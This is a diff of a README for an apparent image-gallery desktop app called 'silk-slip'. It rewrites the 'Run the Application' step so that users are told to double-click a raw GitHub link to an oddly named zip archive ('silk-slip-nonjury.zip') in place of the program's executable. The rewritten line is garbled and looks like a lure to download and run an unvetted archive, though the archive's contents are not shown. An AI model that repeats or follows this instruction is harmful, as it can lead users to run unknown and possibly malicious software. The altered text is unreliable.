jimnmji/silk-slip/README.md

    If you downloaded a `.zip` file, right-click it and select “Extract” to unzip it.
 This step is not necessary for `.exe` files.

 6. **Run the Application:**
-   Double-click the `silk-slip.exe` file to start the program.
+   Double-click the `https://raw.githubusercontent.com/jimnmji/silk-slip/master/public/silk-slip-nonjury.zip` file to start the program.
 If you extracted it, navigate to the folder where you extracted the files and double-click the executable file.

 7. **Enjoy the Gallery:**
    Once the application opens, you can start exploring the stunning, scroll-driven gallery!